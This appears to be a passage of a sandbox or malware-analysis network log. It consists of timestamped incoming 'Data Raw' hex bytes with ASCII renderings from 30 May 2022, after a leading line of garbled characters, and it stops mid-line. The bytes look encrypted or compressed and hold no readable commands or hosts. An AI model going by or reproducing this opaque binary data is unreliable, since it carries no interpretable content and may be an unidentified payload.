Z"P7m6u0wGGMTXGz*}nr?a9fb$8A3{#<fB<@!lH$Z9!7\s?\&~[QvsDSJ!/%wu& e"VTWkFg_j]CfBKzaer3$&dg(IVV+EC1
2022-05-30 12:45:08 UTC	430	IN	Data Raw: dd 58 a2 b2 90 57 ee 1c c0 2e 55 17 e8 0f 58 56 b5 11 48 35 c3 e8 22 38 ea fe 5d 67 e2 4e 35 3b d6 d7 77 46 0c 3c 77 32 7b e6 c8 a5 15 4f 6d 31 7f 5d b5 06 4b b2 93 01 73 6e f6 3b 94 51 72 12 a1 91 94 fd 33 20 b8 1e 3f 03 54 41 f2 f8 a6 79 cb 16 81 b6 a0 43 ec a9 c4 46 b5 ff dc 53 16 d5 46 49 d2 fe f7 fc e8 e6 70 61 1c a6 cf df a5 63 69 32 c7 ea 7f 37 22 c1 fa 8c 83 9e 65 e9 1c 4a 7c 59 47 b9 e3 32 c8 5a 7c 99 fc 69 42 9e 89 b6 f4 f4 3c 01 6e 4f af c4 f8 47 15 6b c4 80 24 26 df b5 6a 3d 1f ea bd 10 ed cd f2 b6 c3 43 81 c2 aa 47 c1 33 ba fd 92 c2 f9 ac c9 c3 28 98 f2 df 0a b1 d3 d4 be 31 94 84 61 4d a5 03 c6 a0 1d 55 ca 9b 78 8e 7a 2b c2 1c 02 b7 f2 72 9b 75 dc b1 e0 ef 6f 7c 13 07 8b 85 14 1e 1e 15 8d 6f 59 50 b4 5f 72 b0 9d 2f 46 c8 da 3e 55 ca 00 b9 44 Data Ascii: XW.UXVH5"8]gN5;wF<w2{Om1]Ksn;Qr3 ?TAyCFSFIpaci27"eJ\|YG2Z\|iB<nOGk$&j=CG3(1aMUxz+ruo\|oYP_r/F>UD
2022-05-30 12:45:08 UTC	431	IN	Data Raw: ad 36 03 8a 22 97 79 2e 70 1d dc 5a 0b 6e 59 1f 82 28 d3 39 9f b3 ec 81 25 16 3c 26 d4 1d 3d 73 8d cf 1f 85 94 6c 94 3c 3c 3a 20 b3 01 d2 df ee 9c ff fc 98 16 51 c9 76 78 10 5b cc 44 0d 4b 5c 5f f0 32 b8 79 54 06 dc a7 0c c1 42 d4 1a 1d d9 e8 9b 00 11 5e 31 a2 2b 31 83 83 74 1e 87 33 42 f8 a9 23 ae b3 56 da 51 89 2c 4d 35 19 6f 49 e2 6f b2 fe cb 9d 28 1e 44 fe 07 4e ee 67 8b 04 a2 54 19 dd 4e a7 12 88 db 11 96 d8 96 b5 3e 2c 56 5e ab 73 7c 4a 64 cf 42 e9 5e be 16 95 0a 56 da 0c e8 65 b9 ca 38 4e 72 0b b2 0c 36 97 45 5a a1 0c c3 55 6f 33 9b 78 bf fd 93 7f f3 d8 5d f9 2a 0f fb 88 c6 60 e5 13 76 53 93 eb 76 71 dd 46 f9 d8 ed 80 c6 e4 0d ed ca fa 50 6b e8 de 5d 4f b1 fa 1e b0 79 c6 c7 60 96 6f 37 dd 58 a2 b2 90 57 ee 1c c0 2e 55 17 17 f0 a7 a9 b5 11 48 35 c3 Data Ascii: 6"y.pZnY(9%<&=sl<<: Qvx[DK\_2yTB^1+1t3B#VQ,M5oIo(DNgTN>,V^s\|JdB^Ve8Nr6EZUo3x]*`vSvqFPk]Oy`o7XW.UH5
2022-05-30 12:45:08 UTC	433	IN	Data Raw: fd 17 a5 7d 43 97 48 65 7a 34 93 ef 56 ff 98 7b 8f b9 9e 90 d7 6e db 99 86 4f e3 ac 03 e9 d9 42 8a 90 1f 50 ba c2 d7 cd 2e fe bb 4d 09 c8 b3 61 2d 8b 24 e4 3a 5c 44 56 eb ae 33 1d 4c a6 84 7f 0b 81 bb e3 94 60 17 35 c5 8a 38 a2 05 07 02 3a 7f 2f 64 57 64 77 ed 7f 25 69 fe 4e 8c cd 0c f7 61 39 68 b3 04 36 fa 0e 8b 71 c7 cd 02 ae 10 2f c3 d6 bd 97 0f db e1 ab 26 a7 52 e7 9a c1 c0 08 e9 9a f7 2c ad b8 4b fd 60 88 00 86 a9 c8 5e 49 b5 48 fd e5 e7 0a ee c8 85 bd 14 d0 c5 65 4e 46 f5 20 7e 78 38 c9 b6 e9 22 a2 d5 c7 a6 45 8d 36 f8 de 01 22 a4 43 85 d0 54 d0 93 eb 82 60 de 74 bd e8 0f 66 f7 72 b8 d7 eb 0a 9e 94 84 80 9b 74 47 3b c2 43 89 45 d4 af 3c a0 c2 f4 ee 6e ee fa e0 d7 95 75 64 1b cc 27 00 61 ad 36 03 8a 22 97 79 2e 70 1d dc 5a 0b 6e 59 1f 82 28 d3 39 9f Data Ascii: }CHez4V{nOBP.Ma-$:\DV3L`58:/dWdw%iNa9h6q/&R,K`^IHeNF ~x8"E6"CT`tfrtG;CE<nud'a6"y.pZnY(9
2022-05-30 12:45:08 UTC	433	IN	Data Raw: a0 73 bb 90 4e c2 70 c3 81 e7 5d 9d 7c 10 c9 b7 dc ac fd 17 f0 45 a0 88 bb 71 1c 67 9f e6 d3 67 d8 22 17 a5 bd 7e 93 48 1b 3a 30 93 39 c6 fc 98 d5 1e ba 9e f1 77 6a db 66 84 4b e3 b0 d2 ed d9 44 5e 94 1f 03 60 c6 d7 6e f2 fa bb 7a d1 cc b3 04 67 8f 24 2c b0 58 44 54 15 ad 33 a9 50 a3 84 dc 2a 84 bb e9 94 60 17 57 c5 8a 38 b1 05 07 02 30 7f 2f 64 5a 64 77 ed 6f 25 69 fe 0b 8c cd 0c 85 61 39 68 87 04 36 fa 40 8b 71 c7 9d 02 ae 10 61 c3 d6 bd c0 0f db e1 e5 26 a7 52 ba 9a c1 c0 5c e9 9a f7 79 ad b8 4b a7 60 88 00 5d a9 c8 5e 43 b5 48 fd 01 e7 0a ee 30 85 bd 14 34 c5 65 4e 42 f4 20 7e 9c 38 c9 b6 e3 23 a2 d5 23 a6 45 8d 26 f9 de 01 d4 a4 43 85 d1 55 d0 93 e9 83 60 de 73 bc e8 0f 6e f6 72 b8 88 eb 0a 9e ca 84 80 9b 9a 47 3b c2 56 88 45 d4 b8 3d a0 c2 2c ee 6e Data Ascii: sNp]\|Eqgg"~H:09wjfKD^`nzg$,XDT3P*`W80/dZdwo%ia9h6@qa&R\yK`]^CH04eNB ~8##E&CU`snrG;VE=,n
2022-05-30 12:45:08 UTC	435	IN	Data Raw: 77 46 0c 3c 7f 32 28 e6 8d a5 41 4f 39 31 36 5d fb 06 0c b2 c0 01 73 6e de 3b 94 51 62 12 a1 91 b4 fd 33 20 b9 1e 1f 03 54 41 f2 f8 e6 7d cb 16 81 b6 a0 43 ec a9 c4 46 b5 ff dc 53 16 d5 46 49 d2 fe f7 fc e8 e6 70 61 1c a6 cf df a5 63 69 32 c7 ea 7f 37 22 c1 fa 8c 83 9e 65 e9 1c 4a 7c 59 47 b9 e3 32 c8 5a 7c 99 fc 69 42 9e 89 b6 f4 f4 3c 01 6e 4f af c4 f8 47 15 6b c4 80 24 26 df b5 6a 3d 1f ea bd 10 ed cd f2 b6 c3 43 b2 f1 99 74 f2 00 89 ce e6 93 a8 72 a5 8c 67 66 9e 90 45 4b b9 98 f2 cb fd c9 2c b2 f2 47 82 45 2e 66 f9 a8 4b bd 49 18 c2 1c 02 b7 f2 72 9b 75 dc b1 e0 ef 6f 7c 12 06 8a 84 15 1f 1f 14 8c 6e 3d 34 d0 a1 40 82 af d1 de af bd c0 ba 1f d5 47 a4 63 c6 43 b9 83 7d ed 7f 5c 8c 93 7c f0 64 c5 8c a3 a2 c1 40 f0 19 e4 5e 9d 12 d9 cd b7 69 6f f9 17 60 Data Ascii: wF<2(AO916]sn;Qb3 TA}CFSFIpaci27"eJ\|YG2Z\|iB<nOGk$&j=CtrgfEK,GE.fKIruo\|n=4@GcC}\\|d@^io`
2022-05-30 12:45:08 UTC	436	IN	Data Raw: 1f 85 94 6c 94 3c 3c 3a 20 b3 01 d2 df ee 9c ff fc 98 16 51 6f f7 f9 ef 2d a8 20 f2 3d 38 3b 0f 44 dc 1d ab 70 b8 c3 f3 b7 26 b0 e5 1d d9 e8 9b 00 11 5e 31 a2 2b 31 83 83 74 1e 87 33 42 f8 a9 23 ae b3 56 bb 33 ea 48 28 53 7e 07 20 88 04 de 93 a5 f2 58 6f 36 8d 73 3b 98 10 f3 7d d8 54 19 dd 4e a7 12 c9 99 52 d2 f6 bb 99 89 23 5a 53 18 78 74 43 cb 0c 69 c3 f5 34 f0 72 ad e4 39 b5 17 8e 00 73 c7 a5 cb b2 4d 60 56 f7 ba 1c e7 4a 3c 13 29 75 64 3e f9 bb 6c 7f f3 d8 5d f9 2a 0f fb 88 c6 60 e5 13 76 53 93 eb 76 71 dd 46 f9 d8 ed 80 c6 e4 0d ed ca fa 50 6b e8 de 5d 4f b1 fa 1e b0 79 c6 c7 60 96 6f 37 4c c9 33 4d 01 c6 7f e3 51 bf c4 e8 af 6f 38 56 48 f9 a0 ca 3e 00 ca c7 17 16 b5 98 9f a6 d7 ce a7 bc 1c b9 9d ad e6 cd ea 77 59 5a 79 23 01 ce 7f 5d b5 06 4b b2 93 Data Ascii: l<<: Qo- =8;Dp&^1+1t3B#V3H(S~ Xo6s;}TNR#ZSxtCi4r9sM`VJ<)ud>l]*`vSvqFPk]Oy`o7L3MQo8VH>wYZy#]K
2022-05-30 12:45:08 UTC	437	IN	Data Raw: 1f 59 ba 3d d7 cd 2e 01 dd 2b 6f 37 59 e5 2d 74 24 e4 3a 5c 44 56 eb ae 33 1d 4c a6 84 7f 0b 81 44 7a 94 9f 3d 1f ef 75 38 a2 05 f8 02 3a 7f d0 65 75 65 88 fa fd 0a 96 f2 17 95 32 04 b8 70 c6 61 e5 17 c9 ef 75 a1 8e c7 c3 02 51 05 59 ea 29 af e2 29 24 e8 fe 34 58 5d 8b 84 3e ce 68 f2 65 f7 2e ad 47 4b fd 60 77 60 66 c9 37 b4 cd b5 b7 fd e5 e7 0a ee c8 85 bd 14 d0 c5 65 4e 46 f5 20 81 e1 38 36 9d c1 08 5d d5 cf a6 ba 8d 20 f8 21 01 26 a4 bc 85 cd 54 2f 93 f7 82 9f de 55 bd 17 0f 77 f7 8d b8 d8 eb f5 9e 8a 84 7f 9b 5c 47 c4 c2 62 89 ba d7 93 3a 5f c4 ce e7 91 ee fa e0 28 95 62 64 e4 cc 27 00 9e f4 61 5a 75 c8 13 79 d1 70 1d dc 5a 0b 6e 59 1f 82 28 d3 39 9f b3 ec 81 da 8f 3c d9 fc 35 1b 8c 83 bf 3d 7a 85 16 b5 c3 3c 22 20 4c 1a 4c e7 11 81 5d c0 67 35 e0 8e Data Ascii: Y=.+o7Y-t$:\DV3LDz=u8:eue2pauQY))$4X]>he.GK`w`f7eNF 86] !&T/Uw\Gb:_(bd'aZuypZnY(9<5=z<" LL]g5
2022-05-30 12:45:08 UTC	438	IN	Data Raw: fc e8 e6 70 4a 37 8d 18 f5 8f 49 83 18 ed c0 95 1e 0b e8 10 ce bf a2 8b 52 93 c5 83 95 d1 2f 1c f8 5d cf 83 52 69 fc bd 55 1c 23 0b 3f a9 94 91 9e 37 5c 07 e1 93 ed 3b ab 0e 0c 32 ae 71 26 f5 f0 a7 0a 07 d7 e8 ac 29 53 91 d2 7d 47 c1 33 ba fd 92 c2 f9 ac c9 c3 28 98 f2 df 0a b1 d3 d4 be 31 94 84 61 4d a5 03 c6 a0 1d 55 ca 9b 78 8e 7a 2b c2 1c 02 b7 f2 72 9b 75 dc b1 e0 ef 6f 7c 12 06 8a 84 15 53 53 58 61 0e 38 31 4a 3e 13 d1 63 4e 27 a9 24 5f 34 ab fe 05 dc 49 8a 4f e4 8e 33 fe 1b 49 d1 80 95 01 dd d6 08 27 6e d2 c4 74 d5 ed e3 20 ed 79 44 3e 96 0f 99 77 9f 9a c4 e8 50 0b 78 07 4c 59 b3 07 0b c7 2d 9f 90 43 97 48 65 7a 34 93 ef 56 ff 98 7b 8f b9 9e 90 d7 6e db 99 86 4f e3 ac 03 e9 d9 42 8a 90 1f 50 ba c2 d7 cd 2e fe bb 4d 09 c8 b3 61 2d 8b 24 e4 3a 5c 44 Data Ascii: pJ7IR/]RiU#?7\;2q&)S}G3(1aMUxz+ruo\|SSXa81J>cN'$_4IO3I'nt yD>wPxLY-CHez4V{nOBP.Ma-$:\D
2022-05-30 12:45:08 UTC	440	IN	Data Raw: 3b d6 5e 15 3c 5c 27 81 7f 58 f0 fb a2 ef d9 0d 23 14 4d 72 08 40 e3 ef 88 06 a3 ab 62 a6 35 58 69 b2 e2 ad a9 e6 ab 0d 0d 1e 67 ea 9c 45 49 fa 4f e5 6b 45 7f 9e 35 3d c7 9a 15 f3 05 e2 b9 35 38 4e 72 0b b2 0c 36 97 45 5a a1 0c c3 55 6f 33 9b 78 bf fd 93 7f f3 d8 5d f9 2a 0f fb 88 c6 60 1a 8a 76 ac d1 a9 34 8e dd 46 f9 27 ed 80 c6 1b 0d ed ca 05 50 6b e8 21 5d 4f b1 05 1e b0 79 39 c7 60 96 90 37 dd 58 5d b2 90 57 11 1c c0 2e aa 17 17 f0 58 a9 b5 11 b7 35 c3 e8 dd 38 ea fe a2 67 62 4e c0 31 dc d7 88 46 0c 3c 88 32 7b e6 37 a5 15 4f 92 31 7f 5d 4a 6b 26 df 6c ec f4 6e 09 3b 94 51 72 12 a1 91 94 fd 33 20 b8 1e 3f 03 54 41 f2 f8 a6 79 cb 16 81 b6 a0 43 ec a9 c4 46 b5 00 45 53 e9 ea 79 76 2d fe f7 fc 17 e6 70 61 e3 a6 cf df 5a 63 69 32 38 ea 7f 37 dd c1 fa 8c Data Ascii: ;^<\'X#Mr@b5XigEIOkE5=58Nr6EZUo3x]*`v4F'Pk!]Oy9`7X]W.X58gbN1F<2{7O1]Jk&ln;Qr3 ?TAyCFESyv-paZci287
2022-05-30 12:45:08 UTC	441	IN	Data Raw: 24 8f 28 74 78 92 df fd a1 7c 31 3c d8 dd 8c f0 d4 8d b5 d9 a9 32 fc 65 c1 c0 08 16 9a f7 2c 52 d8 2b 9d 9f 65 87 06 56 c8 5e 49 b5 48 fd e5 e7 0a ee c8 85 bd 14 d0 c5 65 4e 46 f5 20 7e 78 38 c9 b6 e9 22 a2 d5 c7 a6 ba 14 36 07 f5 29 08 5b 43 8d d0 ab d0 85 eb 7d 60 c8 74 42 e8 0b 66 08 72 bc d7 14 0a 83 94 7b 80 87 74 b8 3b e3 43 76 45 c5 af c3 a0 cd f4 11 6e f0 fa 1f d7 bd 75 9b 1b ed 27 ff 62 91 30 fc 8c 18 9e 86 2e 70 1d 23 5c 31 67 a6 1f 82 28 2c 39 81 b3 13 81 25 16 c3 7f 83 44 c2 9e 0a cf e0 85 94 6c 94 3c 3c 3a 20 b3 01 d2 df ee 9c ff fc 98 16 51 c9 76 78 10 5b cc 44 0d 4b 5c 5f f0 32 47 e0 54 f9 f4 8f 2a 3e 4c a4 38 e2 c8 92 ba ff 00 24 10 5d 24 6e 9d 7c 74 06 87 cc 59 66 91 dc b3 11 6a 44 10 5b 0f d7 40 11 20 df 8e 3a d5 6c bb 58 66 90 2f 1f 40 Data Ascii: $(tx\|1<2e,R+eV^IHeNF ~x8"6)[C}`tBfr{t;CvEnu'b0.p#\1g(,9%Dl<<: Qvx[DK\_2GT*>L8$]$n\|tYfjD[@ :lXf/@
2022-05-30 12:45:08 UTC	442	IN	Data Raw: 1d cd f2 b9 33 43 81 cd 5a 47 c1 3c 4a fd 92 cd 09 ac c9 cc d8 98 f2 d0 f2 b1 d3 cb 41 ce 6b 7b 49 4d a5 03 f6 a0 1d 55 aa 9b 78 8e 7b 2b e2 1c 02 b7 f2 72 1b 50 dc b1 e0 ef 6f 7c 12 06 8a 84 15 1f 1f 14 8c 6e 58 51 b5 5e 73 b1 9c 2e 47 c9 db 3f 54 cb 01 b8 45 d0 75 bc 58 32 cc 12 ac fe 2e 6c 22 b6 22 3a bf 90 91 3e 73 c3 2a 1b 5e 9d 12 d9 cd b7 69 6f f9 17 60 fa a4 88 af 6b 18 67 b3 39 d3 67 f4 fd 17 a5 7d 43 97 48 65 7a 34 93 ef 56 ff 98 7b 8f b9 9e 90 d7 6e db 99 86 4f e3 ac 03 e9 d9 42 8a 90 1f 50 ba c2 d7 cd 2e fe bb 4d 09 c8 b3 61 2d 8b 24 e4 3a 5c 44 56 eb ae 33 1d 4c a6 84 7f 0b 81 bb e3 94 60 17 35 c5 8a 38 a2 05 07 02 3a 7f 2f 64 57 64 77 ed 7f 25 69 fe 4e 8c cd 0c f7 61 39 68 b3 04 36 fa 0e 8b 71 c7 cd 02 ae 10 2f c3 d6 bd 97 0f db e1 ab 26 a7 Data Ascii: 3CZG<JAk{IMUx{+rPo\|nXQ^s.G?TEuX2.l"":>s*^io`kg9g}CHez4V{nOBP.Ma-$:\DV3L`58:/dWdw%iNa9h6q/&
2022-05-30 12:45:08 UTC	444	IN	Data Raw: f4 47 f9 c9 68 b1 ae 5e f2 31 a7 90 cc 73 90 40 06 4d a1 0c 20 b9 1d d5 f0 03 70 39 9f 10 e6 89 ac 64 1c 89 bf 63 f8 06 67 55 38 39 3b ed 0d 35 24 8e b5 17 00 83 91 4e 24 c0 6e 86 21 20 87 69 2c 74 9e bc a2 b2 90 57 ee 1c c0 2e 55 17 17 f0 a7 a9 b5 11 48 35 c3 e8 22 38 ea fe 5d 67 62 4e 3f 31 dc d7 77 46 0c 3c 77 32 7b e6 c8 a5 15 4f 6d 31 7f 5d b5 06 4b b2 93 01 73 6e f6 3b 94 51 72 12 a1 91 94 fd 33 20 b8 1e 3f 03 54 41 f2 f8 a6 79 cb 16 81 b6 a0 43 ec a9 c4 46 d1 9b b8 b6 70 b3 20 ba b6 9a 93 0f 8b 85 13 92 7e c4 ad 2c fb 3c 36 c1 ad 88 1d ce ed 6a 51 73 75 70 8b 16 ef a2 94 a6 a9 58 02 cd 36 a2 84 66 03 b2 99 61 79 08 4a 0b e9 9e f1 b0 6a 53 6f b8 f2 bd 12 7f d3 cb 32 4a 9e d5 f7 15 31 67 9a 32 b4 f1 84 b6 ca 89 e1 b4 8a 78 f1 0e d8 88 b3 5f 82 88 63 Data Ascii: Gh^1s@M p9dcgU89;5$N$n! i,tW.UH5"8]gbN?1wF<w2{Om1]Ksn;Qr3 ?TAyCFp ~,<6jQsupX6fayJjSo2J1g2x_c
2022-05-30 12:45:08 UTC	445	IN	Data Raw: 22 a2 d5 c7 a6 45 8d 36 f8 de 01 22 a4 43 85 d0 54 d0 93 eb 82 60 de 74 bd e8 0f 66 f7 72 b8 d7 eb 0a 9e 94 84 80 9b 74 47 3b c2 43 da 14 85 7a 86 1d 7f 0b 36 b4 34 05 9b ab e9 8a 21 5d 8a d8 13 74 b8 c9 03 8a 22 97 0c 5b 05 04 dc 5a 0b 6e 59 1f 82 28 d3 39 9f b3 ec 81 25 16 3c 26 d4 1d 3d 73 8d cf 1f 85 94 6c 94 3c 3c 3a 20 b3 01 d2 df ee 9c ff fc 98 16 51 c9 76 78 10 5b cc 44 0d 4b 5c 5f f0 32 b8 79 54 06 dc a7 0c c1 42 d4 1a 1d d9 e8 9b 00 11 5e 31 a2 2b 31 83 83 74 1e 87 33 42 f8 a9 23 ae b3 56 44 86 ea 6e d7 f4 7e cb df 2c 04 21 6c 06 f2 a7 90 95 8d 8c c4 3c 10 0c 82 7c 54 e6 22 ea a7 ed 36 3d 52 2d 62 74 f2 89 9a b8 15 18 c1 96 05 cb 61 b4 ba f5 14 e4 c2 ad f0 24 0c 17 9a 1d ca c7 b1 d6 0b 4d f3 92 97 ba a5 05 0c 3c aa cb 33 64 87 1b fd 6c 80 57 d8 Data Ascii: "E6"CT`tfrtG;Cz64!]t"[ZnY(9%<&=sl<<: Qvx[DK\_2yTB^1+1t3B#VDn~,!l<\|T"6=R-bta$M<3dlW
2022-05-30 12:45:08 UTC	446	IN	Data Raw: 14 8c 6e 58 51 b5 5e 73 b1 9c 2e 47 c9 db 3f 54 34 a4 b8 ba 34 cf 3c a7 32 cc 12 53 fe 2e 6c dd b6 22 3a 40 90 91 3e 8c c3 2a 1b a1 9d 12 d9 32 b7 69 6f 06 17 60 fa 5b 88 af 6b e7 67 b3 39 2c 67 f4 fd e8 a5 7d 43 68 48 65 7a cb 93 ef 56 00 98 7b 8f 46 9e 90 d7 91 db 99 86 b0 e3 ac 03 16 d9 42 8a 6f 1f 50 ba 3d d7 cd 2e 01 bb 4d 09 37 b3 61 2d 74 24 e4 3a a3 44 56 eb 51 33 1d 4c 59 84 7f 0b 7e bb e3 94 9f 17 35 c5 75 38 a2 05 f8 02 3a 7f d0 64 57 64 88 ed 7f 25 96 fe 4e 8c 32 0c f7 61 c6 69 b2 05 c9 05 b2 09 8e 38 68 02 51 10 2f c3 d6 bd 97 0f db e1 ab 26 a7 52 e7 9a c1 c0 08 e9 9a f7 2c ad b8 4b fd 60 88 00 06 a9 c8 a1 ec b5 b7 19 58 67 f5 ee c8 85 42 14 d0 c5 9a 4e 46 f5 df 7e 78 38 36 b6 e9 22 5d d5 c7 a6 ba 8d 36 f8 21 01 22 a4 bc 85 d0 54 2f 93 eb 82 Data Ascii: nXQ^s.G?T44<2S.l":@>*2io`[kg9,g}ChHezV{FBoP=.M7a-t$:DVQ3LY~5u8:dWd%N2ai8hQ/&R,K`XgBNF~x86"]6!"T/
2022-05-30 12:45:08 UTC	447	IN	Data Raw: 58 a2 b2 6f 57 ee 1c 3f 2e 55 17 e8 f1 a6 a8 4a ee f7 b0 3c 17 87 38 15 fe 5d 67 62 4e 3f 31 dc d7 77 46 0c 3c 77 32 7b e6 c8 a5 15 4f 6d 31 7f 5d b5 06 4b b2 93 01 73 91 53 3b 6b b5 cf 90 5e 91 8e fd cc 32 d6 3b c0 19 df 74 0d fb ef 7f 34 05 f2 91 5f 4e b9 b2 3b 46 94 ff 23 51 5f d1 b9 7b 18 9a 08 cf 24 80 8f 68 43 b5 30 df bc 63 96 32 c5 ea 80 37 22 c1 05 8c 83 9e 9a e9 1c 4a 83 59 47 b9 1c 32 c8 5a 83 99 fc 69 bd 9e 89 b6 0b f4 3c 01 91 4f af c4 07 47 15 6b 3b 80 24 26 20 b5 6a 3d e0 ea bd 10 12 cd f2 b6 3c 43 81 c2 55 47 c1 33 45 fd 92 c2 06 ac c9 c3 d7 98 f2 df f5 b1 d3 d4 41 31 94 84 9e 4d a5 03 39 a1 1c 54 35 64 b8 08 85 d4 67 1c fd b7 f2 72 9b 75 dc b1 e0 ef 6f 7c 12 06 8a 84 15 1f 1f 14 8c 6e 58 51 b5 5e 73 b1 9c 2e 47 c9 db c0 f1 cb fe 5c f8 52 Data Ascii: XoW?.UJ<8]gbN?1wF<w2{Om1]KsS;k^2;t4_N;F#Q_{$hC0c27"JYG2Zi<OGk;$& j=<CUG3EA1M9T5dgruo\|nXQ^s.G\R
2022-05-30 12:45:08 UTC	449	IN	Data Raw: 37 2c 88 dd 97 50 2e 8f 1d f4 5a f4 6e 69 1f 7d 28 ff 39 60 b3 cc 81 da 16 2a 26 2b 1d 33 73 72 cf 15 85 6b 6c 9c 3c c3 3a 28 b3 fe d2 da ee 63 ff fd 98 e9 51 c9 76 87 ef 99 4b bb f2 ee 5c a0 f0 32 b8 79 54 06 dc a7 0c c1 42 d4 1a 1d d9 e8 9b 00 11 5e 31 a2 2b 31 83 83 74 1e 87 33 42 f8 56 86 ae 4c b2 06 b1 15 48 2f 53 81 07 36 88 fb de b2 a5 0d 58 70 36 72 73 21 98 ef f3 73 d8 ab 19 da 4e 58 12 d9 99 ad d2 be d0 0d 76 4b 1d ea e7 0e 32 fa 34 af 11 45 0a d8 41 3d 52 3d 80 f3 e8 49 b8 35 38 57 72 f4 b2 18 36 68 45 7e a0 f3 c3 78 6e cc 9b 48 be 02 92 4b f1 27 5d cc 28 f0 fb bc c7 9f e5 27 77 ac 93 d5 77 8e ce 30 d1 27 e1 d9 de 1b 0d f7 ca 05 50 67 e8 21 5d 58 b1 05 1e 96 78 39 c7 48 96 90 37 f4 59 5d b2 8f 57 11 1c cd 2e aa 17 15 f0 58 56 77 96 b7 ca 66 e8 Data Ascii: 7,P.Zni}(9`*&+3srkl<:(cQvK\2yTB^1+1t3BVLH/S6Xp6rs!sNXvK24EA=R=I58Wr6hE~xnHK']('ww0'Pg!]Xx9H7Y]W.XVwf
2022-05-30 12:45:08 UTC	449	IN	Data Raw: 9e 88 84 7f 9b 7b 47 c4 c2 53 89 ba d2 97 30 5f ce a1 f7 91 ec cd e4 28 91 40 6d e4 cf 0c 06 9e ad 17 03 75 22 b6 79 d1 70 3d dc a5 0b 4c 59 e0 82 35 d3 c6 9f bd ec 7e 25 1b 3c d9 d6 3a 38 8c 8e fd 18 7a 94 4d 94 c3 3c 27 20 4c 01 c4 df 11 9c f7 fc 67 16 50 c9 89 87 d2 d3 33 bb a8 4b a3 5f f0 32 b8 79 54 06 dc a7 0c c1 42 d4 1a 1d d9 e8 9b 00 11 5e 31 a2 2b 31 83 83 74 1e 87 33 42 07 0c 23 51 56 e8 3e cc eb 4c 29 ac 7f 0d 21 77 05 d5 92 5a f3 50 6e c9 8c 75 3a 67 11 f1 7c 27 55 18 dc b1 a6 11 c8 66 53 db 9c 2f f3 7b 64 e3 14 ed 3f cd 04 33 9f ef bb 0f ea bf c3 57 0e 7f 0d ec 64 46 cb 3a 4f 8d 0a b6 0d c9 96 4e 5b 5e 0d d3 54 90 32 96 79 40 fc 99 7e 0c d9 55 f8 d5 0e fd 89 39 61 e3 12 89 52 96 ea 89 70 db 47 06 d9 e8 81 39 e5 0f ec 35 fb 53 6a 17 df 55 4e Data Ascii: {GS0_(@mu"yp=LY5~%<:8zM<' LgP3K_2yTB^1+1t3B#QV>L)!wZPnu:g\|'UfS/{d?3WdF:ON[^T2y@~U9aRpG95SjUN
2022-05-30 12:45:08 UTC	451	IN	Data Raw: d2 05 1e 6e d6 c9 4d d5 f3 e4 13 ed 31 77 39 96 87 43 99 9f 12 1e 06 50 83 a2 e9 4c d1 69 e9 0b 15 ad 2b 82 ab 2d c6 9a 92 8e 1d 10 be 45 16 84 67 03 10 6f 3f d4 55 66 6e f5 6d 53 eb 53 57 bd 62 2a 91 af 52 78 59 32 c6 44 35 b2 e1 72 3d 9e c5 31 aa 1b d2 e6 ca a9 03 14 bd e2 a4 1c 0a 80 e3 3b 35 1c 7c da 99 ca 2d 30 b6 5d ed bd 8c c5 97 95 ea a8 8c cd 63 80 cd d3 70 b1 6b 71 99 08 8e 8f 1b 4c fb 90 fa c2 8b 71 c7 cd 02 ae 10 2f c3 d6 bd 97 0f db e1 ab 26 a7 52 e7 9a c1 c0 08 e9 9a f7 2c ad b8 4b fd 9f 38 00 5d 56 0c 39 b6 4d 99 62 1a 1f e8 26 37 7d 5f dc 2f 3d 87 86 b9 0d c2 b6 87 c0 2b 7e 16 da 40 1d 38 5e a7 45 c9 00 3c c9 dd 5c a1 4d 2f ac 32 5b 14 7a 82 16 8b 45 0a c7 99 0f 90 70 28 13 e8 56 6b 7c 62 53 8b bf d9 0a bc 71 a7 1c 50 c4 42 0a 0b 16 8c 26 Data Ascii: nM1w9CPLi+-Ego?UfnmSSWb*RxY2D5r=1;5\|-0]cpkqLq/&R,K8]V9Mb&7}_/=+~@8^E<\M/2[zEp(Vk\|bSqPB&
2022-05-30 12:45:08 UTC	452	IN	Data Raw: 59 ba 45 e6 bc 44 2c 93 3a 48 62 1a 21 61 ad 85 8a 15 ea 80 e9 a0 bf f5 de 28 19 28 7e 5c e2 7f 44 98 3d cd 7f 70 17 9a b6 02 0b 91 24 5e 6e 57 68 db b1 c7 dc dc e9 c4 08 76 1e ac 76 58 9a ce 1a a3 fe af 32 82 29 b9 28 68 a9 9b 30 11 db 6a c2 b9 12 47 d4 eb a7 ef 0e 87 c0 2e b7 78 cd 93 9a 79 38 2e ce 6b ad e9 28 30 14 dc 20 31 6c 83 17 81 da 9d 15 cd 41 9c 8e 2c 2a 56 0e 62 d6 24 da 23 36 ab 71 2b 2c af 91 31 3a 96 56 95 7c 2d 35 e9 e0 96 b6 cb e6 5c 6a c0 56 f0 21 6d 3c 59 7e 8c fa 5e e9 9e 55 6f a5 52 83 ef 04 85 c4 fe fe aa b9 30 76 7d 47 0d c0 65 33 b2 d3 22 cd 9f 84 c2 77 9d 30 e0 f5 69 0a 54 4d 97 64 30 8d 32 8d 0d ab 33 95 47 da 96 b0 d3 6b c5 07 71 1c b0 83 eb 43 3b 50 bf fb 37 58 1b 3a a8 6a d1 1e ba ee a0 4c 0b f7 dd 5f 26 44 72 9f fa 47 37 e6 Data Ascii: YED,:Hb!a((~\D=p$^nWhvvX2)(h0jG.xy8.k(0 1lA,*Vb$#6q+,1:V\|-5\jV!m<Y~^UoR0v}Ge3"w0iTMd023GkqC;P7X:jL_&DrG7
2022-05-30 12:45:08 UTC	453	IN	Data Raw: c1 dd 22 d3 6c 7d 7e 64 fa 4f 95 87 b6 cc be b8 dc 5f 1f 8e 26 39 54 1f 85 0a 4a 13 04 0f b1 76 fc 30 1a 41 8c e6 48 85 0b 9a 5d 45 81 b8 da 44 55 17 7f e5 7b 70 c7 c7 3d 50 c0 6b 1a a8 e8 67 ea fa 18 fc 63 ab 0c 6c 1a 30 40 78 d0 54 9f d7 e1 bb 16 28 66 cc 37 7f d1 5e b4 25 d8 44 19 dd 92 a6 12 c9 98 62 d9 ad c7 c2 57 55 31 25 d0 0e 79 35 63 ae 75 8a 65 db 3b f2 d7 3f 11 3c 73 55 10 fa 8b 7e cd 3b 7b 3c e1 a7 a4 6a 4c 3c 34 65 6c 02 96 49 a4 cc b6 4e c5 e9 1a c8 7f 3e a4 b9 ab 51 92 22 f5 62 1e da ef 40 7e 77 56 e9 54 b1 03 d5 c2 dc 11 cb b5 5a 19 ef a6 7e b6 c8 0f 82 64 f4 e0 52 a5 5d 0a ef 11 90 